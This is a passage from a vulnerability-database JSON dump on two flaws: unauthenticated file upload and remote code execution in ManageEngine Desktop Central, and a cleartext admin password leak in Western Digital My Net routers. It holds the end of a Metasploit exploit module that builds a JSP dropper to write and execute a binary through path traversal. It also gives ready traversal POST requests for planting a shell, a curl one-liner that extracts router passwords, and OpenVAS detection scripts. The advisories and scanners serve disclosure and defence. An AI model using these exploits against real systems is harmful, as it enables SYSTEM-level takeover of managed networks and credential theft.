rand_text_alpha_lower(8) + \".exe\"\r\n\r\n jsp_payload = jsp_drop_and_execute(exe, exe_filename)\r\n jsp_name = rand_text_alpha_lower(8) + \".jsp\"\r\n\r\n send_request_cgi({\r\n 'uri' => normalize_uri('statusUpdate'),\r\n 'method' => 'POST',\r\n 'data' => jsp_payload,\r\n 'ctype' => 'text/html',\r\n 'vars_get' => {\r\n 'actionToCall' => 'LFU',\r\n 'configDataID' => '1',\r\n 'customerId' => rand_text_numeric(4),\r\n 'fileName' => '../' * 6 << jsp_name\r\n }\r\n })\r\n # We could check for HTTP 200 and a \"success\" string.\r\n # However only some later v8 and v9 versions return this; and we don't really care\r\n # and do a GET to the file we just uploaded anyway.\r\n\r\n register_files_for_cleanup(exe_filename)\r\n register_files_for_cleanup(\"..\\\\webapps\\\\DesktopCentral\\\\#{jsp_name}\")\r\n\r\n print_status(\"#{peer} - Executing payload\")\r\n send_request_cgi(\r\n {\r\n 'uri' => normalize_uri(jsp_name),\r\n 'method' => 'GET'\r\n })\r\n end\r\n\r\n\r\n def jsp_drop_bin(bin_data, output_file)\r\n jspraw = %Q|<%@ page import=\"java.io.*\" %>\\n|\r\n jspraw << %Q|<%\\n|\r\n jspraw << %Q|String data = \"#{Rex::Text.to_hex(bin_data, \"\")}\";\\n|\r\n\r\n jspraw << %Q|FileOutputStream outputstream = new FileOutputStream(\"#{output_file}\");\\n|\r\n\r\n jspraw << %Q|int numbytes = data.length();\\n|\r\n\r\n jspraw << %Q|byte[] bytes = new byte[numbytes/2];\\n|\r\n jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\\n|\r\n jspraw << %Q|{\\n|\r\n jspraw << %Q| char char1 = (char) data.charAt(counter);\\n|\r\n jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\\n|\r\n jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\\n|\r\n jspraw << %Q| comb <<= 4;\\n|\r\n jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\\n|\r\n jspraw << %Q| bytes[counter/2] = (byte)comb;\\n|\r\n jspraw << %Q|}\\n|\r\n\r\n jspraw << %Q|outputstream.write(bytes);\\n|\r\n jspraw << %Q|outputstream.close();\\n|\r\n jspraw << %Q|%>\\n|\r\n\r\n jspraw\r\n end\r\n\r\n\r\n def jsp_execute_command(command)\r\n jspraw = %Q|\\n|\r\n jspraw << %Q|<%\\n|\r\n jspraw << %Q|Runtime.getRuntime().exec(\"#{command}\");\\n|\r\n jspraw << %Q|%>\\n|\r\n\r\n jspraw\r\n end\r\n\r\n\r\n def jsp_drop_and_execute(bin_data, output_file)\r\n jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34594/"}, {"lastseen": "2016-02-03T23:24:34", "bulletinFamily": "exploit", "description": "ManageEngine Desktop Central - Arbitrary File Upload / RCE. CVE-2013-7390,CVE-2014-5005,CVE-2014-5006,CVE-2014-5007. Webapps exploit for jsp platform", "modified": "2014-09-01T00:00:00", "published": "2014-09-01T00:00:00", "id": "EDB-ID:34518", "href": "https://www.exploit-db.com/exploits/34518/", "type": "exploitdb", "title": "ManageEngine Desktop Central - Arbitrary File Upload / RCE", "sourceData": "Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP\r\nDiscovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n=================================================================================\r\n\r\nBackground on the affected product:\r\n\"Desktop Central is an integrated desktop & mobile device management\r\nsoftware that helps in managing the servers, laptops, desktops,\r\nsmartphones and tablets from a central point. It automates your\r\nregular desktop management routines like installing patches,\r\ndistributing software, managing your IT Assets, managing software\r\nlicenses, monitoring software usage statistics, managing USB device\r\nusage, taking control of remote desktops, and more.\"\r\n\r\nThere are several vulnerable servers are out there if you know the\r\nGoogle dorks. Quoting the author of the Internet Census 2012: \"As a\r\nrule of thumb, if you believe that \"nobody would connect that to the\r\nInternet, really nobody\", there are at least 1000 people who did.\"\r\nThese vulnerabilities can be abused to achieve remote code execution\r\nas SYSTEM in Windows. I've updated the desktopcentral_file_upload\r\nMetasploit module to use the new statusUpdate technique. Needless to\r\nsay, owning a Desktop Central box will give you control of all the\r\ncomputers and smartphones it manages.\r\n\r\nTechnical details:\r\n#1\r\nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)\r\nConstraints: none; no authentication or any other information needed\r\n\r\na)\r\nCVE-2014-5005\r\nAffected versions: all versions from v7 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nPOST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1\r\n<... your favourite jsp shell here ...>\r\n\r\nb)\r\nCVE-2014-5006\r\nAffected versions: all versions from v8 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nPOST /mdm/mdmLogUploader?filename=..\\\\..\\\\..\\webapps\\\\DesktopCentral\\\\shell.jsp\r\n<... your favourite jsp shell here ...>\r\n\r\n\r\n#2\r\nCVE-2014-5007\r\nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)\r\nConstraints: no authentication needed; need to know valid\r\ncomputerName, domainName and customerId\r\nAffected versions: all versions from v7 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nNotes: This was previously discovered as CVE-2013-7390 / OSVDB-10008\r\nby Thomas Hibbert, and was \"fixed\" in 2013-11-09. The fix is\r\nincomplete and it is still possible to upload a shell with a valid\r\ncomputerName, domainName and customerId.\r\n\r\nPOST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\shell.jsp\r\n<... your favourite jsp shell here ...>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34518/"}, {"lastseen": "2016-02-03T05:32:26", "bulletinFamily": "exploit", "description": "Western Digital My Net Wireless Routers - Password Disclosure. CVE-2013-5006. Webapps exploit for hardware platform", "modified": "2013-08-02T00:00:00", "published": "2013-08-02T00:00:00", "id": "EDB-ID:27288", "href": "https://www.exploit-db.com/exploits/27288/", "type": "exploitdb", "title": "Western Digital My Net Wireless Routers - Password Disclosure", "sourceData": "Vulnerable Systems:\r\nWestern Digital My Net Series Wireless Routers:\r\nN600 Firmware 1.03.12\r\nN600 Firmware 1.04.16\r\n\r\nN750 Firmware 1.03.12\r\nN750 Firmware 1.04.16\r\n\r\nN900 Firmware 1.05.12\r\nN900 Firmware 1.06.18\r\nN900 Firmware 1.06.28\r\n\r\nN900C Firmware 1.05.12\r\nN900C Firmware 1.06.18\r\nN900C Firmware 1.06.28\r\n\r\nCVE 2013-5006\r\nCWE-256 Plaintext Storage of a Password\r\nCVSS Base Score 4.3\r\nCVSS Impact Subscore 2.9\r\nCvss Expoit Score 8.6\r\n(AV:N/AC:M/Au:N/C:P/I:N/A:N/E:POC/RL:U/RC:UR/CDP:H/TD:H/CR:H/IR:H/AR:H)\r\n\r\nProof of concept:\r\ncurl -s http://<IP>:8080/main_internet.php? | egrep -i 'var pass'\r\n\r\nwhich will give an output similar to this ex:\r\nvar pass=\"\";\r\n\r\nDetails:\r\nBy sending a specially crafted command to the affected routers, the clear text password for the admin account can be extracted, with no authentication required to access the page where it is stored.\r\n\r\nDuring the initial setup of these four routers with the affected firmware, the admin password is stored in clear text on the main_internet.php? source code page as the value for 'var pass'. For this bug to exploitable from a remote network attack, UPnP and remote administrative access (port 8080 is set by default) must be enabled.\r\n\r\nThe vendor has not responded to any inquiries concerning the bug.\r\n\r\nExternal Sources:\r\nOSVDB - http://www.osvdb.org/show/osvdb/95519\r\nCVE-Mitre - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5006\r\nIBM xforce - http://xforce.iss.net/xforce/xfdb/85903\r\nBugtraq/SecList - http://www.securityfocus.com/archive/1/527433\r\nSecurity Database - http://www.security-database.com/detail.php?alert=CVE-2013-5006\r\n\r\nVendor's Network Router Product Pages:\r\nhttp://www.wdc.com/en/products/network/routers/\r\nhttp://support.wdc.com/download/notes/My_Net_N900C_FW_Release_Notes_1.07.16.pdf?v=9564\r\nhttp://support.wdc.com/download/notes/My_Net_N900_FW_Release_Notes_1.07.16.pdf?v=7436\r\nhttp://support.wdc.com/download/notes/My_Net_N750_FW_Release_Notes_1_04_16.pdf?v=6879\r\nhttp://support.wdc.com/download/notes/My_Net_N600_FW_Release_Notes_1_04_16.pdf?v=4950\r\n\r\nAdditional Notes/Fixes/Workarounds:\r\n\r\nFirmware notes: N900 and N900C with firmware 1.07.16 released on 05/2013 fixes the bug. It is advised that users with the N900 or N900C upgrade to 1.07.16. Earlier firmware releases of 1.02.02, 1.03.11 and 1.04.08 are unaffected.\r\n\r\nN600 and N750 with the earlier firmware 1.01.04 and 1.01.20 are unaffected by this bug. Firmware 1.02.08 was not tested. The 'workaround' for these two model routers, which will only stop network side attacks, is for the end user to disable remote administrative access capabilities.\r\n\r\nDiscovered - 07-02-2013\r\nUpdated - 07-31-2013\r\nResearch Contact - K Lovett\r\nAffiliation - SUSnet", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/27288/"}], "openvas": [{"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "scanner", "description": "Multiple ManageEngine Products are prone to an arbitrary-file-upload\n vulnerability.", "modified": "2019-03-05T00:00:00", "published": "2014-09-09T00:00:00", "id": "OPENVAS:1361412562310105084", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105084", "title": "Multiple ManageEngine Products Arbitrary File Upload Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_manageengine_desktopcentral_69494.nasl 13994 2019-03-05 12:23:37Z cfischer $\n#\n# Multiple ManageEngine Products Arbitrary File Upload Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zohocorp:manageengine_desktop_central\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105084\");\n script_bugtraq_id(69494, 69493);\n script_cve_id(\"CVE-2014-5005\", \"CVE-2014-5006\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 13994 $\");\n script_name(\"Multiple ManageEngine Products Arbitrary File Upload Vulnerability\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 13:23:37 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-09 13:20:38 +0200 (Tue, 09 Sep 2014)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_manage_engine_desktop_central_detect.nasl\");\n script_mandatory_keys(\"ManageEngine/Desktop_Central/installed\");\n script_require_ports(\"Services/www\", 8020);\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/69494\");\n\n script_tag(name:\"impact\", value:\"An attacker may leverage this issue to upload arbitrary files to the\n affected computer. This can result in arbitrary code execution within the context of the vulnerable application.\");\n\n script_tag(name:\"vuldetect\", value:\"Check if it is possible to upload a file.\");\n\n script_tag(name:\"solution\", value:\"Ask the vendor for an update.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"Multiple ManageEngine Products are prone to an arbitrary-file-upload\n vulnerability.\");\n\n script_tag(name:\"affected\", value:\"ManageEngine Desktop Central versions 7 through 9 build 90054\n ManageEngine Desktop Central MSP.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nuseragent = http_get_user_agent();\n\nhost = http_host_name( port:port );\nvtstrings = get_vt_strings();\nvt_string_lo = vtstrings[\"lowercase\"];\nvt_string = vtstrings[\"default\"];\n\npat = vt_string + \" RCE Test\";\nex = '<%= new String(\"' + pat + '\") %>';\nlen = strlen( ex );\nfile = vt_string_lo + '_' + rand() + '.jsp';\nurl = dir + '/statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../' + file + '&configDataID=1';\n\nreq = 'POST ' + url + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n 'Accept: */*\\r\\n' +\n 'Content-Type: multipart/form-data;\\r\\n' +\n '\\r\\n' +\n ex;\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nurl = dir + \"/\" + file;\nreq = http_get( item:url, port:port );\nbuf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( pat >< buf ) {\n report = 'It was possible to upload the file \"' + dir + '/' + file + '\". Please delete this file.';\n report += '\\n' + report_vuln_url( url:url, port:port );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:25", "bulletinFamily": "scanner", "description": "This host is running Western Digital My Net Router and is prone to information\n disclosure vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2013-08-05T00:00:00", "id": "OPENVAS:1361412562310803731", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803731", "title": "Western Digital My Net Devices Information Disclosure Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wdmn_wireless_router_info_disc_vuln.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Western Digital My Net Devices Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803731\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-5006\");\n script_bugtraq_id(61361);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-05 16:18:11 +0530 (Mon, 05 Aug 2013)\");\n script_name(\"Western Digital My Net Devices Information Disclosure Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Western Digital My Net Router and is prone to information\n disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP request and check whether it is able to read the\n password or not.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 1.07.16, for the My Net N900 and My Net N900.\n For My Net N600 and My Net N750 solution is to revert to the earlier firmware of 1.01.04 or 1.01.20,\n or disable remote administrative access.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"insight\", value:\"The issue is due to the device storing the admin password in clear text in the\n main_internet.php source code page as the value for 'var pass'.\");\n\n script_tag(name:\"affected\", value:\"Western Digital My Net N600 1.03, 1.04,\n\n Western Digital My Net N750 1.03, 1.04,\n\n Western Digital My Net N900 1.05, 1.06 and\n\n Western Digital My Net N900C 1.05, 1.06\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to gain access to credential\n information.\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/10\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/85903\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/527433\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/bugtraq/2013-07/0146.html\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"MyNetN679/banner\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"http://www.wdc.com/en\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port: port);\nif(banner && banner =~ \"MyNetN[6|7|9]\")\n{\n req = http_get(item: \"/main_internet.php\", port:port);\n res = http_keepalive_send_recv(port:port,data:req);\n\n if(\">WESTERN DIGITAL\" >< res && \"WIRELESS ROUTER\" >< res\n && res =~ 'var pass=\".*\";' )\n {\n security_message(port:port);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T13:13:31", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-09-04T00:00:00", "published": "2014-09-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87216", "id": "SSV:87216", "type": "seebug", "title": "ManageEngine Desktop Central - Arbitrary File Upload / RCE", "sourceData": "\n Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP\r\nDiscovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n=================================================================================\r\n \r\nBackground on the affected product:\r\n"Desktop Central is an integrated desktop & mobile device management\r\nsoftware that helps in managing the servers, laptops, desktops,\r\nsmartphones and tablets from a central point. It automates your\r\nregular desktop management routines like installing patches,\r\ndistributing software, managing your IT Assets, managing software\r\nlicenses, monitoring software usage statistics, managing USB device\r\nusage, taking control of remote desktops, and more."\r\n \r\nThere are several vulnerable servers are out there if you know the\r\nGoogle dorks. Quoting the author of the Internet Census 2012: "As a\r\nrule of thumb, if you believe that "nobody would connect that to the\r\nInternet, really nobody", there are at least 1000 people who did."\r\nThese vulnerabilities can be abused to achieve remote code execution\r\nas SYSTEM in Windows. I've updated the desktopcentral_file_upload\r\nMetasploit module to use the new statusUpdate technique. Needless to\r\nsay, owning a Desktop Central box will give you control of all the\r\ncomputers and smartphones it manages.\r\n \r\nTechnical details:\r\n#1\r\nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)\r\nConstraints: none; no authentication or any other information needed\r\n \r\na)\r\nCVE-2014-5005\r\nAffected versions: all versions from v7 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nPOST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1\r\n<... your favourite jsp shell here ...>\r\n \r\nb)\r\nCVE-2014-5006\r\nAffected versions: all versions from v8 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nPOST /mdm/mdmLogUploader?filename=..\\\\..\\\\..\\webapps\\\\DesktopCentral\\\\shell.jsp\r\n<... your favourite jsp shell here ...>\r\n \r\n \r\n#2\r\nCVE-2014-5007\r\nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)\r\nConstraints: no authentication needed; need to know valid\r\ncomputerName, domainName and customerId\r\nAffected versions: all versions from v7 to v9 build 90054\r\nFix: Upgrade to DC v9 build 90055\r\nNotes: This was previously discovered as CVE-2013-7390 / OSVDB-10008\r\nby Thomas Hibbert, and was "fixed" in 2013-11-09. The fix is\r\nincomplete and it is still possible to upload a shell with a valid\r\ncomputerName, domainName and customerId.\r\n \r\nPOST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\shell.jsp\r\n<... your favourite jsp shell here ...>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87216", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T13:26:43", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-80902", "id": "SSV:80902", "type": "seebug", "title": "Western Digital My Net Wireless Routers - Password Disclosure", "sourceData": "\n Vulnerable Systems:\r\nWestern Digital My Net Series Wireless Routers:\r\nN600 Firmware 1.03.12\r\nN600 Firmware 1.04.16\r\n\r\nN750 Firmware 1.03.12\r\nN750 Firmware 1.04.16\r\n\r\nN900 Firmware 1.05.12\r\nN900 Firmware 1.06.18\r\nN900 Firmware 1.06.28\r\n\r\nN900C Firmware 1.05.12\r\nN900C Firmware 1.06.18\r\nN900C Firmware 1.06.28\r\n\r\nCVE 2013-5006\r\nCWE-256 Plaintext Storage of a Password\r\nCVSS Base Score 4.3\r\nCVSS Impact Subscore 2.9\r\nCvss Expoit Score 8.6\r\n(AV:N/AC:M/Au:N/C:P/I:N/A:N/E:POC/RL:U/RC:UR/CDP:H/TD:H/CR:H/IR:H/AR:H)\r\n\r\nProof of concept:\r\ncurl -s http://<IP>:8080/main_internet.php? | egrep -i 'var pass'\r\n\r\nwhich will give an output similar to this ex:\r\nvar pass="";\r\n\r\nDetails:\r\nBy sending a specially crafted command to the affected routers, the clear text password for the admin account can be extracted, with no authentication required to access the page where it is stored.\r\n\r\nDuring the initial setup of these four routers with the affected firmware, the admin password is stored in clear text on the main_internet.php? source code page as the value for 'var pass'. For this bug to exploitable from a remote network attack, UPnP and remote administrative access (port 8080 is set by default) must be enabled.\r\n\r\nThe vendor has not responded to any inquiries concerning the bug.\r\n\r\nExternal Sources:\r\nOSVDB - http://www.osvdb.org/show/osvdb/95519\r\nCVE-Mitre - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5006\r\nIBM xforce - http://xforce.iss.net/xforce/xfdb/85903\r\nBugtraq/SecList - http://www.securityfocus.com/archive/1/527433\r\nSecurity Database - http://www.security-database.com/detail.php?alert=CVE-2013-5006\r\n\r\nVendor's Network Router Product Pages:\r\nhttp://www.wdc.com/en/products/network/routers/\r\nhttp://support.wdc.com/download/notes/My_Net_N900C_FW_Release_Notes_1.07.16.pdf?v=9564\r\nhttp://support.wdc.com/download/notes/My_Net_N900_FW_Release_Notes_1.07.16.pdf?v=7436\r\nhttp://support.wdc.com/download/notes/My_Net_N750_FW_Release_Notes_1_04_16.pdf?v=6879\r\nhttp://support.wdc.com/download/notes/My_Net_N600_FW_Release_Notes_1_04_16.pdf?v=4950\r\n\r\nAdditional Notes/Fixes/Workarounds:\r\n\r\nFirmware notes: N900 and N900C with firmware 1.07.16 released on 05/2013 fixes the bug. It is advised that users with the N900 or N900C upgrade to 1.07.16. Earlier firmware releases of 1.02.02, 1.03.11 and 1.04.08 are unaffected.\r\n\r\nN600 and N750 with the earlier firmware 1.01.04 and 1.01.20 are unaffected by this bug. Firmware 1.02.08 was not tested. The 'workaround' for these two model routers, which will only stop network side attacks, is for the end user to disable remote administrative access capabilities.\r\n\r\nDiscovered - 07-02-2013\r\nUpdated - 07-31-2013\r\nResearch Contact - K Lovett\r\nAffiliation - SUSnet\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-80902", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:05", "bulletinFamily": "exploit", "description": "", "modified": "2014-08-31T00:00:00", "published": "2014-08-31T00:00:00", "href": "https://packetstormsecurity.com/files/128108/ManageEngine-Desktop-Central-Remote-Shell-Upload.html", "id": "PACKETSTORM:128108", "type": "packetstorm", "title": "ManageEngine Desktop Central Remote Shell Upload", "sourceData": "`>> Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n================================================================================= \n \n>> Background on the affected product: \n\"Desktop Central is an integrated desktop & mobile device management \nsoftware that helps in managing the servers, laptops, desktops, \nsmartphones and tablets from a central point. It automates your \nregular desktop management routines like installing patches, \ndistributing software, managing your IT Assets, managing software \nlicenses, monitoring software usage statistics, managing USB device \nusage, taking control of remote desktops, and more.\" \n \nThere are several vulnerable servers are out there if you know the \nGoogle dorks. Quoting the author of the Internet Census 2012: \"As a \nrule of thumb, if you believe that \"nobody would connect that to the \nInternet, really nobody\", there are at least 1000 people who did.\" \nThese vulnerabilities can be abused to achieve remote code execution \nas SYSTEM in Windows. I've updated the desktopcentral_file_upload \nMetasploit module to use the new statusUpdate technique. Needless to \nsay, owning a Desktop Central box will give you control of all the \ncomputers and smartphones it manages. \n \n>> Technical details: \n#1 \nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated) \nConstraints: none; no authentication or any other information needed \n \na) \nCVE-2014-5005 \nAffected versions: all versions from v7 to v9 build 90054 \nFix: Upgrade to DC v9 build 90055 \nPOST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1 \n<... your favourite jsp shell here ...> \n \nb) \nCVE-2014-5006 \nAffected versions: all versions from v8 to v9 build 90054 \nFix: Upgrade to DC v9 build 90055 \nPOST /mdm/mdmLogUploader?filename=..\\\\..\\\\..\\webapps\\\\DesktopCentral\\\\shell.jsp \n<... your favourite jsp shell here ...> \n \n \n#2 \nCVE-2014-5007 \nVulnerability: Remote code execution as SYSTEM via file upload (unauthenticated) \nConstraints: no authentication needed; need to know valid \ncomputerName, domainName and customerId \nAffected versions: all versions from v7 to v9 build 90054 \nFix: Upgrade to DC v9 build 90055 \nNotes: This was previously discovered as CVE-2013-7390 / OSVDB-10008 \nby Thomas Hibbert, and was \"fixed\" in 2013-11-09. The fix is \nincomplete and it is still possible to upload a shell with a valid \ncomputerName, domainName and customerId. \n \nPOST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\shell.jsp \n<... your favourite jsp shell here ...> \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128108/managedc-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:20:24", "bulletinFamily": "exploit", "description": "", "modified": "2013-08-01T00:00:00", "published": "2013-08-01T00:00:00", "href": "https://packetstormsecurity.com/files/122640/Western-Digital-My-Net-Password-Disclosure.html", "id": "PACKETSTORM:122640", "type": "packetstorm", "title": "Western Digital My Net Password Disclosure", "sourceData": "`Vulnerable Systems: \nWestern Digital My Net Series Wireless Routers: \nN600 Firmware 1.03.12 \nN600 Firmware 1.04.16 \n \nN750 Firmware 1.03.12 \nN750 Firmware 1.04.16 \n \nN900 Firmware 1.05.12 \nN900 Firmware 1.06.18 \nN900 Firmware 1.06.28 \n \nN900C Firmware 1.05.12 \nN900C Firmware 1.06.18 \nN900C Firmware 1.06.28 \n \nCVE 2013-5006 \nCWE-256 Plaintext Storage of a Password \nCVSS Base Score 4.3 \nCVSS Impact Subscore 2.9 \nCvss Expoit Score 8.6 \n(AV:N/AC:M/Au:N/C:P/I:N/A:N/E:POC/RL:U/RC:UR/CDP:H/TD:H/CR:H/IR:H/AR:H) \n \nProof of concept: \ncurl -s http://<IP>:8080/main_internet.php? | egrep -i 'var pass' \n \nwhich will give an output similar to this ex: \nvar pass=\"\"; \n \nDetails: \nBy sending a specially crafted command to the affected routers, the clear text password for the admin account can be extracted, with no authentication required to access the page where it is stored. \n \nDuring the initial setup of these four routers with the affected firmware, the admin password is stored in clear text on the main_internet.php? source code page as the value for 'var pass'. For this bug to exploitable from a remote network attack, UPnP and remote administrative access (port 8080 is set by default) must be enabled. \n \nThe vendor has not responded to any inquiries concerning the bug. \n \nExternal Sources: \nOSVDB - http://www.osvdb.org/show/osvdb/95519 \nCVE-Mitre - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5006 \nIBM xforce 